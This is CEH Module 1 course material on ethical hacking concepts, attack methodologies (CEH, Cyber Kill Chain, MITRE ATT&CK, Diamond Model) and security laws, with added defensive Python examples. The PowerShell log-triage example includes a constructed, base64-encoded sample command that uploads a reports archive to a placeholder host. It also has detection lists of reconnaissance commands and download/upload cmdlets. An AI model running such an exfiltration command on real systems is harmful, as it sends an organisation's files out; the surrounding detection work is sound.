CEH Module 1
Introduction to Ethical Hacking
Riaz Gul
Elements of Information Security
Information security is a state of well-being of information and
infrastructure in which the possibility of theft, tampering and
disruption of information and services is low or tolerable.
Confidentiality: the assurance that the information is accessible only to
authorized users.
Integrity: the trustworthiness of data or resources in terms of preventing
improper and unauthorized changes.
Availability: the assurance that the systems responsible for delivering,
storing and processing information are accessible when required by
authorized users.
Authenticity: the characteristic of communication, documents or
any data that ensures the quality of being genuine or uncorrupted.
Non-repudiation: a way to guarantee that the sender of a message cannot
later deny having sent the message and that the recipient cannot deny having
received the message.
Attacks: Motive, Goals and Objectives
Attackers generally have motives (goals) and objectives behind their information
security attacks. A motive originates from the notion that the target system stores or
processes something valuable, which leads to the threat of an attack on the
system.
Attacks = Motive (Goal) + Method + Vulnerability
• Disrupting business continuity
• Stealing information and manipulating data
• Creating fear and chaos by disrupting critical infrastructure
• Causing financial loss to the target
• Propagating religious or political beliefs
• Achieving a state’s military objectives
• Damaging the reputation of the target
• Taking revenge
Classification of Attacks
Passive Attacks
Passive attacks do not tamper with the data; they involve
intercepting and monitoring network traffic and data flow on the
target network. Examples include sniffing and eavesdropping,
footprinting, and network traffic analysis.
Active Attacks
Active attacks tamper with the data in transit or disrupt the
communication or services between systems to bypass or
break into secured systems. Examples: DoS, Man-in-the-Middle, session
hijacking, malware attacks, modification of information, firewall and
IDS attacks, profiling, arbitrary code execution, privilege escalation,
backdoor access, DNS and ARP poisoning, compromised-key
attacks, directory traversal attacks, SQL injection, XSS attacks,
cryptography attacks, and spoofing attacks.
Close-in Attacks
Close-in attacks are performed when the attacker is in close
physical proximity to the target system or network in order to
gather, modify or disrupt access to information. Examples: social
engineering, shoulder surfing and dumpster diving.
Insider Attacks
Insider attacks involve using privileged access to violate rules or
intentionally cause a threat to the organization’s information or
information system.
Information Warfare
The term information warfare or InfoWar refers to the use of information
and communication technologies (ICT) to gain competitive advantages over
an opponent.
Defensive Information Warfare
Refers to all strategies and actions designed to defend against
attacks on ICT assets: prevention, deterrence, alerts, detection,
emergency preparedness and response.
Offensive Information Warfare
Refers to information warfare that involves attacks against
the ICT assets of an opponent: web server attacks, malware
attacks, MITM attacks and system hacking.
Hacking Methodologies & Frameworks
Learning the hacking methodologies and frameworks helps
ethical hackers understand the phases involved in hacking
attempts along with the tactics, techniques and procedures
used by real hackers. This knowledge further helps them in
strengthening the security infrastructure of their organization.
Certified Ethical Hacker Hacking Methodology (CHM)
Cyber Kill Chain Methodology
MITRE Attack Framework
Diamond Model of Intrusion Analysis
Certified Ethical Hacker Hacking Methodology (CHM)
EC-Council’s CEH hacking methodology
defines the step-by-step process to
perform ethical hacking. The CHM
follows the same process as that of an
attacker, and the only differences are in
its hacking goals and strategies.
Footprinting
Footprinting and reconnaissance constitute the preparatory phase,
in which an attacker gathers as much information as possible about
the target prior to launching an attack. In this phase, the attacker
creates a profile of the target organization and obtains information
such as its IP address range, namespace, and employees.
Scanning
Scanning is used to identify active hosts, open ports, and
unnecessary services enabled on particular hosts. In this phase, the
attacker uses the details gathered during reconnaissance to scan
the network for specific information. Scanning is a logical extension
of active reconnaissance; in fact, some experts do not differentiate
scanning from active reconnaissance.
Enumeration
Enumeration involves making active connections to a
target system or subjecting it to direct queries. It is a
method of intrusive probing through which attackers
gather information such as network user lists, routing
tables, security flaws, shared users, groups, applications
and banners.
Vulnerability Analysis
Vulnerability assessment is the examination of the
ability of a system or application, including its current
security procedures and controls, to withstand assault.
System Hacking
Attackers follow a certain methodology to hack a
system. They first obtain information during the
footprinting, scanning, enumeration, and vulnerability
analysis phases, which they then use to exploit the
target system.
Gaining Access
This is the phase in which actual hacking occurs. The
previous phases help attackers identify security
loopholes and vulnerabilities in the target organization's
IT assets. Attackers use this information, along with
techniques such as password cracking and the
exploitation of vulnerabilities including buffer overflows,
to gain access to the target organizational system.
Privilege Escalation
After gaining access to a system using a low-privilege
user account, the attacker may attempt to increase their
privilege to the administrator level to perform protected
system operations so that they can proceed to the next
level of the system hacking phase.
Maintaining Access
Maintaining access refers to the phase in which an
attacker attempts to retain ownership of the system.
Once an attacker gains access to the target system with
admin or root-level privileges, they can use both the
system and its resources at will. The attacker can either
use the system as a launchpad to scan and exploit other
systems or maintain a low profile and continue
exploitation.
Clearing Logs
To remain undetected, it is important for attackers to
erase all the evidence of security compromise from
the system. To achieve this, they might modify or
delete logs in the system using certain log-wiping
utilities, thus removing all evidence of their presence.
Cyber Kill Chain Methodology
The cyber kill chain methodology is a component of
intelligence-driven defense for the identification and
prevention of malicious intrusion activities.
It provides greater insight into attack phases, which helps
security professionals to understand the adversary's
tactics, techniques and procedures beforehand.
It is a framework developed for securing cyberspace based
on the concept of military kill chains. This method aims to
actively enhance intrusion detection and response. The
cyber kill chain is equipped with a seven-phase protection
mechanism to mitigate and reduce cyber threats.
The seven phases:
• Reconnaissance
• Weaponization
• Delivery
• Exploitation
• Installation
• Command & Control
• Actions on Objectives
Reconnaissance
An adversary performs reconnaissance to collect as much
information about the target as possible to probe for
weak points before actually attacking. They look for
information such as publicly available information on the
internet, network information, system information and
the organizational information of the target.
Weaponization
The adversary analyzes the data collected in the previous
stage to identify the vulnerabilities and techniques that can
exploit and gain unauthorized access to the target
organization. Based on the vulnerabilities identified during
analysis, the adversary selects or creates a tailored
deliverable malicious payload using an exploit and a
backdoor to send it to the victim.
Delivery
The previous stage included creating a weapon. Its
payload is transmitted to the intended victims as an email
attachment, via a malicious link on websites, or through a
vulnerable web application or USB drive. Delivery is a key
stage that measures the effectiveness of the defense
strategies implemented by the target organization based
on whether the intrusion attempt of the adversary is
blocked or not.
Exploitation
After the weapon is transmitted to the intended victim,
exploitation triggers the adversary’s malicious code to
exploit a vulnerability in the operating system,
application, or server on the target system. At this stage,
the organization may face threats such as authentication
and authorization attacks, arbitrary code execution,
physical security threats, and security misconfiguration.
Installation
The adversary downloads and installs more malicious
software on the target system to maintain access to
the target network for an extended period. They may
use the weapon to install a backdoor to gain remote
access. After the injection of the malicious code on
one target system, the adversary gains the capability
to spread the infection to other end systems in the
network.
Command and Control
The adversary creates a command-and-control channel, which
establishes two-way communication between the victim's system and
an adversary-controlled server to communicate and pass data back and
forth. The adversaries implement techniques such as encryption to hide
the presence of such channels. Using this channel, the adversary
performs remote exploitation on the target system or network.
Actions on Objectives
The adversary controls the victim's system from a
remote location and finally accomplishes their intended
goals. The adversary gains access to confidential data,
disrupts the services or network, or destroys the
operational capability of the target by gaining access to
its network and compromising more systems.
MITRE ATT&CK Framework
The term Tactics, Techniques, and Procedures (TTPs) refers to the patterns of activities and methods associated with
specific threat actors or groups of threat actors.
Tactics
Tactics are the guidelines that describe the way an attacker performs the attack from beginning to end.
These guidelines consist of the various tactics for information gathering to perform initial exploitation,
privilege escalation, and lateral movement, and to deploy measures for persistent access to the system
and other processes.
Techniques
Techniques are the technical methods used by an attacker to achieve intermediate results during the
attack. These techniques include initial exploitation, setting up and maintaining command and control
channels, accessing the target infrastructure, covering the tracks of data exfiltration, and others.
Procedures
Procedures are organizational approaches that threat actors follow to launch an attack. The number of
actions usually differs depending on the objectives of the procedure and threat actor group.
Adversary Behavioral Identification
Adversary behavioral identification involves the identification of the common methods or techniques
followed by an adversary to launch attacks to penetrate an organization's network. It gives security
professionals insight into upcoming threats and exploits. Some of the adversary behaviors that can
be used to enhance the detection capabilities of security services:
Use of PowerShell
PowerShell can be used by an adversary as a tool for automating data exfiltration and launching
further attacks. To identify the misuse of PowerShell in the network, security professionals can check
PowerShell's transcript logs or Windows event logs. The user agent string and IP address can also be
used to identify malicious hosts that try to exfiltrate data.
Internal Reconnaissance
Once the adversary is inside the target network, they follow various techniques and methods to carry
out internal reconnaissance. This includes the enumeration of systems, hosts and processes, and the
execution of various commands to find out information such as the local user context and system
configuration, hostname, IP addresses, active remote systems, etc.
Other behaviors: use of command line interface, HTTP user agent, command and control server, use of
DNS tunneling, use of web shell, data staging.
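As an added example (not part of the EC-Council material or these slides), the following Python script shows how a defender could review PowerShell script block events for the two behaviors just described: encoded or network-transferring commands, and bursts of internal reconnaissance commands from one host and user. It assumes a simplified, constructed record layout for Windows PowerShell Operational log Event ID 4104 (script block logging); every host, user, timestamp and script below is made up, and the command lists and thresholds are choices made here for illustration, not an official rule set.

```python
import base64
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of Windows PowerShell Operational log records (Event ID 4104,
# script block logging). The field layout is a simplification of the real event
# schema; every value below is made up for this example.
def _encoded(script: str) -> str:
    """Base64 of UTF-16LE text, the form PowerShell expects after -EncodedCommand."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")

SAMPLE_EVENTS = [
    {"time": "2024-03-01T09:00:05", "host": "WS-17", "user": "alice", "event_id": 4104,
     "script": "Get-ChildItem C:\\Reports | Measure-Object"},
    {"time": "2024-03-01T09:01:10", "host": "WS-17", "user": "alice", "event_id": 4104,
     "script": "whoami /all"},
    {"time": "2024-03-01T09:01:40", "host": "WS-17", "user": "alice", "event_id": 4104,
     "script": "net user /domain"},
    {"time": "2024-03-01T09:02:15", "host": "WS-17", "user": "alice", "event_id": 4104,
     "script": "ipconfig /all; systeminfo"},
    {"time": "2024-03-01T09:03:00", "host": "WS-17", "user": "alice", "event_id": 4104,
     "script": "powershell.exe -NoProfile -EncodedCommand " + _encoded(
         "Invoke-WebRequest -Uri http://example.invalid/up -Method Post -InFile C:\\Reports\\export.zip")},
    {"time": "2024-03-01T11:30:00", "host": "SRV-02", "user": "svc_backup", "event_id": 4104,
     "script": "Get-Service | Where-Object Status -eq 'Running'"},
]

# Detection content chosen for this example (illustrative, not an official rule set).
RECON_COMMANDS = ("whoami", "net user", "net group", "ipconfig", "systeminfo", "hostname",
                  "arp -a", "nltest", "Get-NetTCPConnection", "Get-ADUser")
NETWORK_TRANSFER = ("Invoke-WebRequest", "Invoke-RestMethod", "Net.WebClient",
                    "DownloadString", "DownloadFile", "UploadFile", "UploadString")
# -EncodedCommand and its documented short forms, followed by a base64 blob.
ENCODED_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(script):
    """Return the decoded script text if an -EncodedCommand argument is present, else None."""
    m = ENCODED_RE.search(script)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return "<undecodable payload>"


def analyze_event(event):
    """Return the rule names a single 4104 event triggers, in a fixed order."""
    if event.get("event_id") != 4104:
        return []
    hits = []
    text = event["script"]
    decoded = decode_encoded_command(text)
    if decoded is not None:
        hits.append("encoded_command")
        text = text + "\n" + decoded          # inspect the decoded script as well
    if any(tok.lower() in text.lower() for tok in NETWORK_TRANSFER):
        hits.append("network_transfer")
    return hits


def find_recon_bursts(events, window_minutes=5, threshold=3):
    """Flag (host, user) pairs running >= threshold distinct recon commands inside one window."""
    per_actor = defaultdict(list)
    for ev in events:
        lowered = ev["script"].lower()
        seen = {cmd for cmd in RECON_COMMANDS if cmd.lower() in lowered}
        if seen:
            per_actor[(ev["host"], ev["user"])].append((datetime.fromisoformat(ev["time"]), seen))
    bursts = {}
    window = timedelta(minutes=window_minutes)
    for actor, entries in per_actor.items():
        entries.sort(key=lambda e: e[0])
        for i, (start, _) in enumerate(entries):
            distinct = set()
            for t, cmds in entries[i:]:
                if t - start > window:
                    break
                distinct |= cmds
            if len(distinct) >= threshold:
                bursts[actor] = sorted(distinct)
                break
    return bursts


def triage(events):
    """Summarize per-event rule hits and recon bursts for an analyst."""
    findings = [(ev["time"], ev["host"], ev["user"], analyze_event(ev))
                for ev in events if analyze_event(ev)]
    return {"events": findings, "recon_bursts": find_recon_bursts(events)}


if __name__ == "__main__":
    for line in triage(SAMPLE_EVENTS)["events"]:
        print(line)
    print(triage(SAMPLE_EVENTS)["recon_bursts"])
```

The burst rule is deliberately per host and user rather than per command, because a single `whoami` is routine while four different enumeration commands inside a few minutes from one session is the pattern the text describes; the encoded-command check decodes the UTF-16LE payload before matching so that obfuscation by encoding does not hide the transfer cmdlet.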
Indicators of Compromise
Cyber threats are continuously evolving with the newer TTPs adapted based
on the vulnerabilities of the target organization. Security professionals must
perform continuous monitoring of IoCs to effectively and efficiently detect
and respond to evolving cyber threats. Indicators of compromise are the
clues, artifacts, and pieces of forensic data that are found on a network or
operating system of an organization that indicate a potential intrusion or
malicious activity in the organization’s infrastructure.
Indicators of Compromise (IoCs) Categories
• Email Indicators
• Network Indicators
• Host Based Indicators
• Behavioral Indicators
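To make the four categories concrete, here is an added Python example (not from the original slides or EC-Council) that matches a constructed IoC feed against constructed telemetry from a mail gateway, an EDR agent, a DNS resolver and a web proxy. Email, network and host indicators are matched as atomic values after normalization; the behavioral indicator is a simple beaconing heuristic (one host resolving the same domain repeatedly at a near-constant interval) chosen here for illustration. All domains, addresses, hashes and hostnames are made up.

```python
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed IoC feed covering the four categories. Every value is made up:
# ".invalid" domains, documentation IP space, fake SHA-256 hashes.
IOC_FEED = [
    {"category": "email",   "type": "sender",            "value": "billing@paymnt-portal.invalid"},
    {"category": "email",   "type": "attachment_sha256", "value": "A1" * 32},
    {"category": "network", "type": "domain",            "value": "cdn-sync.invalid"},
    {"category": "network", "type": "ip",                "value": "203.0.113.42"},
    {"category": "host",    "type": "file_sha256",       "value": "b2" * 32},
    {"category": "host",    "type": "mutex",             "value": "Global\\upd_sync_v2"},
]

# Constructed telemetry. Field names deliberately match the IoC "type" names so that
# events can be looked up directly in the indicator index.
TELEMETRY = [
    {"source": "mailgw", "time": "2024-03-01T08:55:00", "host": "WS-22", "user": "bob",
     "sender": "Billing@Paymnt-Portal.invalid", "attachment_sha256": "a1" * 32},
    {"source": "edr",   "time": "2024-03-01T08:58:30", "host": "WS-22", "user": "bob",
     "file_sha256": "B2" * 32},
    {"source": "dns",   "time": "2024-03-01T09:00:00", "host": "WS-22", "domain": "cdn-sync.invalid"},
    {"source": "dns",   "time": "2024-03-01T09:01:00", "host": "WS-22", "domain": "cdn-sync.invalid"},
    {"source": "dns",   "time": "2024-03-01T09:02:00", "host": "WS-22", "domain": "cdn-sync.invalid"},
    {"source": "dns",   "time": "2024-03-01T09:03:00", "host": "WS-22", "domain": "cdn-sync.invalid"},
    {"source": "proxy", "time": "2024-03-01T09:03:05", "host": "WS-22", "ip": "203.0.113.42"},
    {"source": "dns",   "time": "2024-03-01T09:10:00", "host": "WS-09", "domain": "updates.example.com"},
]

# Indicator types whose comparison must ignore case (mail addresses, DNS names, hex digests).
CASE_INSENSITIVE = {"sender", "domain", "attachment_sha256", "file_sha256"}


def normalize(ioc_type, value):
    return value.lower() if ioc_type in CASE_INSENSITIVE else value


def build_index(feed):
    """Map (type, normalized value) -> category for O(1) lookups."""
    return {(i["type"], normalize(i["type"], i["value"])): i["category"] for i in feed}


def match_atomic(events, index):
    """One hit per event field whose (name, value) is a known email/network/host indicator."""
    hits = []
    for ev in events:
        for field, value in ev.items():
            if not isinstance(value, str):
                continue
            key = (field, normalize(field, value))
            if key in index:
                hits.append({"category": index[key], "type": field, "value": key[1],
                             "host": ev.get("host"), "source": ev["source"], "time": ev["time"]})
    return hits


def find_beaconing(events, min_queries=4, max_span_minutes=10, jitter_s=5):
    """Behavioral indicator: a host resolving one domain repeatedly at a steady cadence."""
    per_pair = defaultdict(list)
    for ev in events:
        if ev["source"] == "dns":
            per_pair[(ev["host"], ev["domain"].lower())].append(datetime.fromisoformat(ev["time"]))
    findings = []
    for (host, domain), times in per_pair.items():
        times.sort()
        if len(times) < min_queries or times[-1] - times[0] > timedelta(minutes=max_span_minutes):
            continue
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        if max(gaps) - min(gaps) <= jitter_s:       # near-constant interval
            findings.append({"category": "behavioral", "host": host, "domain": domain,
                             "interval_s": sum(gaps) / len(gaps)})
    return findings


def ioc_report(events, feed):
    """Count hits per IoC category and list which categories fired on each host."""
    atomic = match_atomic(events, build_index(feed))
    behavioral = find_beaconing(events)
    by_category = Counter(h["category"] for h in atomic + behavioral)
    hosts = defaultdict(set)
    for h in atomic + behavioral:
        hosts[h["host"]].add(h["category"])
    return {"by_category": dict(by_category),
            "hosts": {h: sorted(c) for h, c in hosts.items()}}


if __name__ == "__main__":
    print(ioc_report(TELEMETRY, IOC_FEED))
```

The per-host view is the useful output: a host on which email, host, network and behavioral indicators all fire within minutes is a much stronger signal than any single hash or domain hit, which is why the report aggregates by host rather than only counting matches.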
MITRE ATT&CK is a globally accessible knowledge base of adversary tactics and techniques
based on real-world observations. The ATT&CK knowledge base is used as a foundation for
the development of specific threat models and methodologies in the private sector,
government, and the cybersecurity product and service community. The following are the
tactics in ATT&CK for Enterprise.
• Reconnaissance
• Resource Development
• Initial Access
• Execution
• Persistence
• Privilege Escalation
• Defense Evasion
• Credential Access
• Discovery
• Lateral Movement
• Collection
• Command and Control
• Exfiltration
• Impact
Diamond Model of Intrusion Analysis
The Diamond Model offers a framework
for identifying the clusters of events that
are correlated on any of the systems in an
organization.
It captures the vital atomic element
occurring in any intrusion activity, which is
referred to as the Diamond event.
Using this model, efficient mitigation
approaches can be developed, and
analytic efficiency can be increased.
Adversary: the opponent who was behind the attack.
Victim: the target that has been exploited or
where the attack was performed.
Capability: the attack strategies or how the attack
was performed.
Infrastructure: what the adversary used to reach
the victim.
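The clustering the Diamond Model enables is easiest to see in code. The following added Python example (not from the slides or the model's authors) represents each Diamond event with its four vertices and groups events that share a capability or infrastructure value into correlated clusters, then uses the clusters to propose attribution for events whose adversary is unknown. The events, actor names, addresses and capability labels are all constructed for this example, and treating a shared vertex as sufficient to link two events is a simplification chosen here for illustration.

```python
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple


@dataclass(frozen=True)
class DiamondEvent:
    """One Diamond event: the four core vertices of the model."""
    event_id: str
    adversary: Optional[str]   # None when attribution is unknown at analysis time
    capability: str            # how the attack was performed (malware family, technique)
    infrastructure: str        # what the adversary used to reach the victim (C2 host, domain)
    victim: str                # the target that was attacked


# Constructed sample: only two events carry a known adversary; the rest are unattributed.
EVENTS = [
    DiamondEvent("E1", "ACTOR-X", "macro-dropper", "203.0.113.10", "finance-ws-01"),
    DiamondEvent("E2", None,      "macro-dropper", "203.0.113.10", "hr-ws-04"),
    DiamondEvent("E3", None,      "rat-beacon",    "203.0.113.10", "finance-ws-01"),
    DiamondEvent("E4", None,      "rat-beacon",    "c2-relay.invalid", "eng-srv-02"),
    DiamondEvent("E5", "ACTOR-Y", "web-shell",     "198.51.100.7", "web-01"),
    DiamondEvent("E6", None,      "cred-dump",     "198.51.100.7", "dc-01"),
    DiamondEvent("E7", None,      "phish-kit",     "phish-login.invalid", "sales-ws-09"),
]


class _UnionFind:
    """Minimal disjoint-set structure used to merge events that share a vertex."""
    def __init__(self, n: int):
        self.parent = list(range(n))

    def find(self, i: int) -> int:
        while self.parent[i] != i:
            self.parent[i] = self.parent[self.parent[i]]   # path halving
            i = self.parent[i]
        return i

    def union(self, a: int, b: int) -> None:
        ra, rb = self.find(a), self.find(b)
        if ra != rb:
            self.parent[rb] = ra


def cluster_events(events: List[DiamondEvent],
                   pivot_on: Tuple[str, ...] = ("capability", "infrastructure")) -> List[List[str]]:
    """Group events that share a value on any pivot vertex; returns sorted lists of event ids."""
    uf = _UnionFind(len(events))
    first_seen: Dict[Tuple[str, str], int] = {}
    for i, ev in enumerate(events):
        for vertex in pivot_on:
            key = (vertex, getattr(ev, vertex))
            if key in first_seen:
                uf.union(i, first_seen[key])
            else:
                first_seen[key] = i
    clusters = defaultdict(list)
    for i, ev in enumerate(events):
        clusters[uf.find(i)].append(ev.event_id)
    return sorted(sorted(ids) for ids in clusters.values())


def infer_attribution(events: List[DiamondEvent],
                      pivot_on: Tuple[str, ...] = ("capability", "infrastructure")
                      ) -> Dict[str, Tuple[Optional[str], str]]:
    """Propose an adversary for unattributed events when their cluster has exactly one known actor."""
    by_id = {ev.event_id: ev for ev in events}
    result = {}
    for cluster in cluster_events(events, pivot_on):
        known = {by_id[e].adversary for e in cluster if by_id[e].adversary}
        for e in cluster:
            ev = by_id[e]
            if ev.adversary:
                result[e] = (ev.adversary, "observed")
            elif len(known) == 1:
                result[e] = (next(iter(known)), "inferred")
            elif len(known) > 1:
                result[e] = (None, "conflict")   # vertex shared by several actors: do not attribute
            else:
                result[e] = (None, "unknown")
    return result


if __name__ == "__main__":
    for ids in cluster_events(EVENTS):
        print("cluster:", ids)
    for eid, (actor, basis) in sorted(infer_attribution(EVENTS).items()):
        print(eid, actor, basis)
```

E1, E2 and E3 are linked through the shared infrastructure 203.0.113.10, E4 joins them through the shared capability rat-beacon, and E6 is linked to E5 by 198.51.100.7; E7 shares nothing and stays an isolated event. The "conflict" outcome matters in practice: shared hosting or a commodity tool can connect events from different actors, and the analyst should treat such a pivot as a lead rather than an attribution.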
HACKING CONCEPT
What is hacking?
Hacking refers to exploiting system vulnerabilities and compromising security
controls to gain unauthorized or inappropriate access to a system’s
resources.
It involves modifying system or application features to achieve a goal outside
of the creator’s original purpose.
Hacking can be used to steal and redistribute intellectual property, leading to
business loss.
Who is a Hacker?
A hacker is a person who breaks into a system or network without
authorization to destroy, steal sensitive data, or perform malicious attacks. A
hacker is an intelligent individual with excellent computer skills, along with
the ability to create and explore the computer's software and hardware.
Hacker Classes
• Black Hats
• White Hats
• Gray Hats
• Suicide Hackers
• Script Kiddies
• Cyber Terrorists
• State Sponsored Hackers
• Hacktivist
• Hacker Teams
• Industrial Spies
• Insider
• Criminal Syndicates
• Organized Hackers
Ethical HACKING
Ethical hacking involves the use of hacking tools, tricks, and techniques
to identify vulnerabilities and ensure system security.
It focuses on simulating the techniques used by attackers to verify the
existence of exploitable vulnerabilities in a system's security.
Ethical hackers perform security assessments for an organization with
the permission of concerned authorities.
Why is Ethical Hacking Necessary?
Ethical hacking is necessary as it allows for
countering attacks from malicious hackers
by anticipating the methods used to break
into the system.
Reasons why organizations recruit ethical hackers:
• To prevent hackers from gaining access to
the organization's information system
• To uncover vulnerabilities in systems and
exploit their potential as a security risk
• To analyze and strengthen an
organization's security posture, including
policies, network protection infrastructure
and end user practices
• To provide adequate preventive
measures to avoid security breaches
• To help safeguard customer data
• To enhance security awareness at all
levels in a business
Information security controls prevent the occurrence of
unwanted events and reduce risk to the organization's
information assets. The basic security concepts critical to
information on the internet are confidentiality, integrity, and
availability; the concepts related to the person accessing the
information are authentication, authorization and non-repudiation.
Information Assurance (IA)
IA refers to the assurance that the integrity, availability,
confidentiality and authenticity of information and
information systems are protected during the usage, processing,
storage and transmission of information.
Continual/Adaptive Security Strategy
Organizations should adopt an adaptive security strategy,
which involves implementing all four network security
approaches.
Defense in Depth
Laws are a system of rules and guidelines that are enforced by a particular
country or community to govern behavior. A standard is a document
established by consensus and approved by a recognized body that
provides, for common and repeated use, rules, guidelines, or
characteristics for activities or their results, aimed at the achievement of
the optimum degree of order in a given context.
Payment Card Industry Data Security Standard (PCI DSS)
The Payment Card Industry Data Security Standard (PCI DSS) is a proprietary
information security standard for organizations that handle cardholder
information for major debit, credit, prepaid, e-purse, ATM and POS cards.
PCI DSS applies to all entities involved in payment card processing, including
merchants, processors, acquirers, issuers, and service providers, as well as
all other entities that store, process or transmit cardholder data.
PCI Data Security Standard High-Level Overview
• Build and Maintain a Secure Network
• Protect Cardholder Data
• Maintain a Vulnerability Management Program
• Implement Strong Access Control Measures
• Regularly monitor and Test Networks
• Maintain an information security policy
Failure to meet the PCI DSS requirements may result in fines or the termination of payment card
processing privileges
ISO/IEC 27001:2013
ISO/IEC 27001:2013 specifies the requirements for establishing,
implementing, maintaining, and continually improving an information
security management system within the context of the organization.
It is intended to be suitable for several different types of use including :
• Use within organizations to formulate security requirements and objectives
• Use within organizations to ensure that security risks are cost-effectively managed
• Use within organizations to ensure compliance with laws and regulations
• Definition of new information security management processes
• Identification and clarification of existing information security management processes
• Use by organization management to determine the status of information security management activities
• Implementation of business enabling information security
• Use by organizations to provide relevant information about information security to customers
Health Insurance Portability and Accountability Act (HIPAA)
HIPAA's Administrative Simplification Statute and Rules
Electronic Transaction and Code Set Standards
Requires every provider who does business
electronically to use the same health care
transactions, code sets, and identifiers.
Privacy Rule
Provides federal protections for the personal
health information held by covered entities and
gives patients an array of rights with respect to
that information.
Security Rule
Specifies a series of administrative, physical, and technical
safeguards for covered entities to use to ensure the confidentiality,
integrity, and availability of electronically protected health
information.
National Identifier Requirements
Requires that health care providers, health plans, and
employers have standard national numbers that identify
them attached to standard transactions.
Enforcement Rule
Provides the standards for enforcing all the
administrative simplification rules.